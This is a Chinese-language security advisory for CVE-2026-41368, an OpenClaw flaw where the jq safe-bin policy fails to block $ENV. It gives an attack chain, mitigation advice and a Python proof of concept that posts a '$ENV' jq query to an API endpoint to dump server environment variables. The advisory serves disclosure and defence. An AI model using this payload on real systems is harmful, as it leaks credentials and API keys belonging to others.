CVE-2026-41368 CVSS 6.5 中危

CVE-2026-41368 OpenClaw环境变量泄露漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41368

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.28之前的版本中存在严重的环境变量泄露漏洞。该漏洞是由于jq safe-bin策略未能正确阻断$ENV过滤器导致的。攻击者能够利用此缺陷绕过安全限制，通过构造特定的jq程序代码，远程访问并读取服务器上敏感的环境变量，造成机密信息泄露。

技术细节

该漏洞的根本原因在于OpenClaw对jq工具的“安全二进制”（safe-bin）策略实现存在缺陷。虽然设计初衷是限制脚本权限以保护系统资源，但过滤逻辑未能覆盖内置的`$ENV`对象。攻击者只需在提交给OpenClaw处理的jq查询中包含`$ENV`或其属性（如`$ENV.SECRET_KEY`），即可绕过限制直接读取进程上下文中的所有环境变量。鉴于CVSS评分为6.5（中危），攻击者仅需低权限且无需用户交互即可通过网络发起攻击。成功利用后，攻击者可获取数据库连接串、API密钥等敏感配置，为进一步攻击提供便利。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在运行OpenClaw 2026.3.28之前的版本。

STEP 2

构造载荷

攻击者构造包含$ENV过滤器的恶意jq查询代码，旨在读取环境变量。

STEP 3

发送请求

攻击者通过网络向OpenClaw的API接口发送包含恶意载荷的HTTP请求，无需用户交互。

STEP 4

信息泄露

OpenClaw服务端处理jq代码时未能拦截$ENV，将敏感环境变量以JSON格式返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41368: OpenClaw Environment Variable Disclosure
# This script demonstrates how to leak environment variables using the $ENV filter in jq.

import requests
import json

def exploit_openclaw(target_url):
    # The malicious payload utilizing the unblocked $ENV filter
    payload = {
        "jq": "$ENV" 
    }
    
    headers = {
        "Content-Type": "application/json"
    }

    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.post(target_url, data=json.dumps(payload), headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Leaked environment variables:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target = "http://localhost:8080/api/execute"
    exploit_openclaw(target)

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

建议在应用防火墙(WAF)中添加规则，拦截包含"$ENV"字符串的HTTP请求体。此外，应尽量减少在环境变量中存储明文密码或密钥，改用更安全的密钥管理服务，直到完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表